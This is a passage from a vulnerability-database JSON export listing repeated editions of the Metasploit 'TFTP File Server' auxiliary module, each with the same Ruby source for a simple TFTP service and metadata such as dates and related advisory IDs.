@tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-22T05:33:28", "differentElements": ["modified", "published"], "edition": 10}, 
{"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-23T01:37:31", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files 
will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-23T01:37:31", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-27T19:48:52", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n 
)\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-27T19:48:52", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-28T03:38:37", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": 
"1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", 
"metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-28T03:38:37", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-06T22:07:28", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n 
def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-09-06T22:07:28", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "b8fe7c8a3e2750eaf39bc6a3b3e1991f", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-07T03:52:43", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "avleonov", "idList": ["AVLEONOV:3A8521BFB3F8C5B46C04F0C82A0F2DC1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1671-1:EBBBE", "DEBIAN:DLA-1666-1:43CD3", "DEBIAN:DSA-4387-1:19CD5"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D1788B89D8B17C5C6DB6F32CC37734F7"]}, {"type": "taosecurity", "idList": 
["TAOSECURITY:8842738F7C86C87FD607E515176F88C8"]}, {"type": "exploitdb", "idList": ["EDB-ID:46342"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107540", "OPENVAS:1361412562310107541", "OPENVAS:1361412562310704387"]}, {"type": "kitploit", "idList": ["KITPLOIT:9165290622393060450", "KITPLOIT:7455761002232864942"]}, {"type": "centos", "idList": ["CESA-2019:0231", "CESA-2019:0232"]}, {"type": "cve", "idList": ["CVE-2019-7659", "CVE-2019-1676"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0153-1"]}], "modified": "2018-09-07T03:52:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n 
srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-09-07T03:52:43", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "5ddba22023fc905a1684e57cd9307977", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T19:16:21", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1111-1", "OPENSUSE-SU-2019:1113-1"]}, {"type": "thn", "idList": ["THN:BD4668D0C2864A2575DE9C758747F0D4", "THN:11AD5537975A6BED16F7C2DFCC323403"]}, {"type": "krebs", "idList": ["KREBS:5D0C14948096E7152BBBFD7B231BB43A"]}, {"type": "threatpost", "idList": ["THREATPOST:EF36042DBE4BC724DB5EBFD76D1D6712"]}, {"type": "ubuntu", "idList": ["USN-3929-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46638", "EDB-ID:46632"]}, {"type": "gentoo", "idList": ["GLSA-201904-08"]}, {"type": "zdt", "idList": ["1337DAY-ID-32465"]}, {"type": 
"kitploit", "idList": ["KITPLOIT:6038992159381141666", "KITPLOIT:6159129042388094301"]}, {"type": "cve", "idList": ["CVE-2019-3792", "CVE-2019-3489", "CVE-2019-3876", "CVE-2017-16775"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:322837E9F552129B2CBD8F0F85D540B7"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4599FE395AEA942F1650F4A831514DC0"]}], "modified": "2019-04-02T19:16:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n 
@tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2019-04-02T19:16:21", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "b8fe7c8a3e2750eaf39bc6a3b3e1991f", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T00:59:47", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1111-1", "OPENSUSE-SU-2019:1113-1"]}, {"type": "thn", "idList": ["THN:BD4668D0C2864A2575DE9C758747F0D4", "THN:11AD5537975A6BED16F7C2DFCC323403"]}, {"type": "threatpost", "idList": ["THREATPOST:5C6E52ADEECE22E57417EB4A24FEA4F5", "THREATPOST:EF36042DBE4BC724DB5EBFD76D1D6712"]}, {"type": "krebs", "idList": ["KREBS:5D0C14948096E7152BBBFD7B231BB43A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32464", "1337DAY-ID-32465", "1337DAY-ID-32472"]}, {"type": "ubuntu", "idList": ["USN-3929-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46638", "EDB-ID:46632"]}, {"type": "gentoo", "idList": ["GLSA-201904-08"]}, {"type": "kitploit", "idList": 
["KITPLOIT:6038992159381141666"]}, {"type": "cve", "idList": ["CVE-2019-3792", "CVE-2019-3489"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:322837E9F552129B2CBD8F0F85D540B7"]}], "modified": "2019-04-03T00:59:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # 
multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2019-04-03T00:59:47", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "sourceHref"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T21:05:07", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "ics", "idList": ["ICSA-19-148-01"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:7385682645190270858"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891804", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1804-1:03BE3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F88308F949790492EC48E2CDD8DBAA16"]}], "modified": 
"2019-05-28T21:05:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n 
end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T21:05:07", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "0b947ee7951ab35799a0e49641135d17", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T14:03:56", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "ics", "idList": ["ICSA-19-148-01"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:7385682645190270858"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891804", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1804-1:03BE3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F88308F949790492EC48E2CDD8DBAA16"]}], "modified": "2019-05-28T21:05:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 
